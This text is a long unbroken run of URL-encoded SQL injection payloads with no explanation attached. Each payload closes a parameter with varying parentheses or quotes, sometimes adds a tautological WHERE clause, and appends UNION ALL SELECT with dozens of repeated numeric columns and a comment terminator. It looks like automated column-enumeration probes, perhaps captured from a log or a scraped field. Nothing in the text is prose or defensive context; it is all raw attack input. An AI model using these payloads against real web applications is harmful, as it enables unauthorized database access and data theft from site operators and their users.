-9064%29%20UNION%20ALL%20SELECT%205210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%23 -7689%29%20UNION%20ALL%20SELECT%203098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%2C3098%23 -7030%29%20UNION%20ALL%20SELECT%209064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%23 -6615%29%20UNION%20ALL%20SELECT%207507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%2C7507%23 -1689%29%20UNION%20ALL%20SELECT%207275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%23 -8030%29%20UNION%20ALL%20SELECT%201547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%23 -1084%29%20UNION%20ALL%20SELECT%209226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%23 -6384%29%29%20UNION%20ALL%20SELECT%201884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%23 -4066%29%29%20UNION%20ALL%20SELECT%205053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%23 -3545%29%29%20UNION%20ALL%20SELECT%205107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%23 -1953%29%29%20UNION%20ALL%20SELECT%202994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%2C2994%23 -5252%29%29%20UNION%20ALL%20SELECT%209903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%23 -1276%29%29%20UNION%20ALL%20SELECT%201323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%23 -1176%29%29%20UNION%20ALL%20SELECT%201786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%23 -8766%29%29%20UNION%20ALL%20SELECT%204016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%2C4016%23 -3896%29%29%20UNION%20ALL%20SELECT%201882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%23 -2957%29%29%20UNION%20ALL%20SELECT%203022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%2C3022%23 -4729%29%29%29%20UNION%20ALL%20SELECT%201041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%23 -5434%29%29%29%20UNION%20ALL%20SELECT%206795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%2C6795%23 -1157%29%29%29%20UNION%20ALL%20SELECT%202249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%23 -2440%29%29%29%20UNION%20ALL%20SELECT%206805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805%23 -2150%29%29%29%20UNION%20ALL%20SELECT%204173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%23 -9964%29%29%29%20UNION%20ALL%20SELECT%201421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%23 -2339%29%29%29%20UNION%20ALL%20SELECT%207947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%2C7947%23 -7542%29%29%29%20UNION%20ALL%20SELECT%206175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%23 -5238%29%29%29%20UNION%20ALL%20SELECT%206040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%2C6040%23 -8136%29%29%29%20UNION%20ALL%20SELECT%206372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%23 -4591%20UNION%20ALL%20SELECT%201442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%2C1442%23 -5006%20UNION%20ALL%20SELECT%209474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%2C9474%23 -3676%20UNION%20ALL%20SELECT%207595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%2C7595%23 -7715%20UNION%20ALL%20SELECT%202905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%2C2905%23 -5707%20UNION%20ALL%20SELECT%202638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%23 -9581%20UNION%20ALL%20SELECT%204906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%23 -4227%20UNION%20ALL%20SELECT%201188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%23 -4421%20UNION%20ALL%20SELECT%209240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%23 -4238%20UNION%20ALL%20SELECT%202623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%23 -8616%20UNION%20ALL%20SELECT%205781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%23 -6988%29%20WHERE%201004%3D1004%20UNION%20ALL%20SELECT%201004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%23 -9564%29%20WHERE%201651%3D1651%20UNION%20ALL%20SELECT%201651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%23 -4034%29%20WHERE%202237%3D2237%20UNION%20ALL%20SELECT%202237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%23 -3176%29%20WHERE%203975%3D3975%20UNION%20ALL%20SELECT%203975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%23 -7614%29%20WHERE%209012%3D9012%20UNION%20ALL%20SELECT%209012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%23 -4496%29%20WHERE%209568%3D9568%20UNION%20ALL%20SELECT%209568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%23 -9446%29%20WHERE%203152%3D3152%20UNION%20ALL%20SELECT%203152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%23 -1966%29%20WHERE%204436%3D4436%20UNION%20ALL%20SELECT%204436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%23 -6018%29%20WHERE%208180%3D8180%20UNION%20ALL%20SELECT%208180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%23 -9311%29%20WHERE%204929%3D4929%20UNION%20ALL%20SELECT%204929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%2C4929%23 -8552%20WHERE%201865%3D1865%20UNION%20ALL%20SELECT%201865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%23 -7346%20WHERE%202074%3D2074%20UNION%20ALL%20SELECT%202074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%2C2074%23 -4232%20WHERE%204556%3D4556%20UNION%20ALL%20SELECT%204556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%23 -9072%20WHERE%204675%3D4675%20UNION%20ALL%20SELECT%204675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%23 -5829%20WHERE%202587%3D2587%20UNION%20ALL%20SELECT%202587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%23 -3162%20WHERE%202187%3D2187%20UNION%20ALL%20SELECT%202187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%23 -9338%20WHERE%206540%3D6540%20UNION%20ALL%20SELECT%206540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%23 -4870%20WHERE%202339%3D2339%20UNION%20ALL%20SELECT%202339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%23 -7311%20WHERE%201557%3D1557%20UNION%20ALL%20SELECT%201557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%2C1557%23 -4657%20WHERE%206124%3D6124%20UNION%20ALL%20SELECT%206124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%2C6124%23 -3301%27%29%20UNION%20ALL%20SELECT%202363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%23 